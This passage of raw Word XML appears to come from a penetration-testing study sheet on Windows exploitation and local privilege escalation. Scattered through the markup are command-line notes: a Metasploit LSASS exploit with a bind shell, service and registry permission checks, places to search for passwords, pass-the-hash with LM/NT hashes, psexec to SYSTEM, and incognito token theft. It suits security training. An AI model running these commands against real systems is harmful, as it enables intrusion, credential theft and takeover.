          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>win</w:t>
      </w:r>
      <w:r w:rsidR="006023BF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>dows/smb/ms04_011_lsass RHOST=&lt;IP&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> PAYLOAD=windows/</w:t>
      </w:r>
      <w:r w:rsidR="006023BF" w:rsidRPr="006023BF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="006023BF" w:rsidRPr="006023BF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>bind_tcp TARGET=0 E</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRPr="00FA3D71" w:rsidRDefault="00FA3D71" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">E5b - </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA3D71">
        <w:t>Knowledge of local windows privilege escalation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vulnerabilities and techniques</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRPr="00331F43" w:rsidRDefault="009D6D8E" w:rsidP="00FA3D7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Insecure service call</w:t>
      </w:r>
      <w:r w:rsidR="00331F43">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00331F43">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>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 xml:space="preserve">service.msc </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00193DE1"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procexp.exe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(check file perms of running svc)</w:t>
      </w:r>
      <w:r w:rsidR="00193DE1" w:rsidRPr="00331F43">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>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accesschk.exe -wcvu "user\user" *</w:t>
      </w:r>
      <w:r w:rsidR="00331F43">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00331F43">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00331F43">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>(check Service permissions)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00193DE1" w:rsidRPr="00331F43" w:rsidRDefault="00193DE1" w:rsidP="00193DE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Task Scheduler</w:t>
      </w:r>
      <w:r w:rsidR="00331F43" w:rsidRPr="00331F43">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</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C:\WINDOWS\Tasks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00193DE1" w:rsidRPr="00331F43" w:rsidRDefault="00193DE1" w:rsidP="00193DE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 xml:space="preserve">Write Access to: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31F43">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>home</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00331F43">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> dirs startmenu/startup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31F43">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>all</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00331F43">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> users startmenu/starup items </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00193DE1" w:rsidRPr="00331F43" w:rsidRDefault="00193DE1" w:rsidP="00193DE1">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00193DE1" w:rsidRPr="00331F43" w:rsidRDefault="00331F43" w:rsidP="00193DE1">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00331F43">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="00193DE1" w:rsidRPr="00331F43">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rite to reg keys</w:t>
      </w:r>
      <w:r w:rsidRPr="00331F43">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00193DE1" w:rsidRPr="00331F43">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>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HKLM\System\CurrentControlSet\Services</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00331F43"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HKCU\Control Panel\Desktop\Scrnsave.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00331F43">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00331F43">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>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HKLM\System\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\StartupPrograms</w:t>
      </w:r>
      <w:r w:rsidRPr="00331F43">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>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HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</w:t>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HKCU\Software\Microsoft\Windows\CurrentVersion\Run</w:t>
      </w:r>
      <w:r w:rsidRPr="00331F43">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00331F43">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00331F43">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00193DE1" w:rsidRPr="00331F43" w:rsidRDefault="00331F43" w:rsidP="00331F43">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00331F43">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00193DE1" w:rsidRPr="00331F43">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00193DE1" w:rsidRPr="00331F43" w:rsidRDefault="00193DE1" w:rsidP="00193DE1">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00193DE1" w:rsidRPr="00BA7C4E" w:rsidRDefault="00193DE1" w:rsidP="00193DE1">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA7C4E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Password</w:t>
      </w:r>
      <w:r w:rsidR="00BA7C4E" w:rsidRPr="00BA7C4E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>s:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA7C4E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>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A7C4E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>shortcuts</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BA7C4E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>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RDP files </w:t>
      </w:r>
      <w:r w:rsidR="002D40C7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(search .rdp)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00331F43"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unattend.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00193DE1" w:rsidRPr="00331F43" w:rsidRDefault="00193DE1" w:rsidP="00193DE1">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00331F43">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00193DE1" w:rsidRPr="00BA7C4E" w:rsidRDefault="00193DE1" w:rsidP="00193DE1">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA7C4E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Check Patches</w:t>
      </w:r>
      <w:r w:rsidR="00BA7C4E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA7C4E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>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MBSA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WSUS </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA7C4E" w:rsidRPr="00331F43" w:rsidRDefault="00BA7C4E" w:rsidP="00193DE1">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRPr="00BA7C4E" w:rsidRDefault="00193DE1" w:rsidP="00193DE1">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA7C4E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Priv Esc in Task Bar</w:t>
      </w:r>
      <w:r w:rsidR="00BA7C4E" w:rsidRPr="00BA7C4E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA7C4E" w:rsidRPr="00BA7C4E" w:rsidRDefault="00BA7C4E"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Running as high privs that can launch other programs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60D81" w:rsidRDefault="00BA7C4E"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Shatter attacks (old now)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60D81" w:rsidRDefault="00B60D81" w:rsidP="00B60D81">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B60D81" w:rsidRPr="00BA7C4E" w:rsidRDefault="00A06D7C" w:rsidP="00B60D81">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PSH:</w:t>
      </w:r>
      <w:r w:rsidR="00B60D81">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD1924"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whoesthere.exe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(or whoesthere-alt.exe)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A06D7C"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r w:rsidRPr="00DD1924">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">iam.exe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD1924">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;user</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&lt;domain&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD1924">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&lt;lm hash&gt;:&lt;nt hash&gt; -r cmd.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>(or iam-alt.exe)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A06D7C" w:rsidRDefault="00A06D7C" w:rsidP="00A06D7C">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A06D7C" w:rsidRDefault="00A06D7C" w:rsidP="00A06D7C">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Incognito:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD1924"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psexec</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> –s </w:t>
      </w:r>
      <w:r w:rsidR="00C90C8C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">–i &lt;session_id&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>cmd.exe</w:t>
      </w:r>
      <w:r w:rsidR="00C90C8C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00C90C8C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">(become  </w:t>
      </w:r>
      <w:r w:rsidR="00C90C8C" w:rsidRPr="00C90C8C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>NT AUTHORITY\SYSTEM</w:t>
      </w:r>
      <w:r w:rsidR="00C90C8C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B60D81" w:rsidRPr="00BA7C4E"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incognito</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> list_tokens </w:t>
      </w:r>
      <w:r w:rsidR="00C90C8C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidR="00C90C8C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00C90C8C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00C90C8C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>(list user tokens)</w:t>
      </w:r>
      <w:r w:rsidR="00B60D81" w:rsidRPr="00BA7C4E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA7C4E"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incognito</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> execute –c &lt;token&gt; cmd.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>(run cmd with user’s stolen token)</w:t>
      </w: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whoami</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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(impersonated user)</w:t>
      </w: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N.B. if doing incognito remotely then no need for system (-h &lt;hosts&gt;)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A06D7C" w:rsidRDefault="00A06D7C" w:rsidP="00A06D7C">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A06D7C" w:rsidRPr="00A06D7C" w:rsidRDefault="00A06D7C" w:rsidP="00A06D7C">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A06D7C">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Meterpreter (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>with i</w:t>
      </w:r>
      <w:r w:rsidRPr="00A06D7C">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ncognito):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A06D7C" w:rsidRP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A06D7C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>msfpayload</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A06D7C">
        <w:rPr>
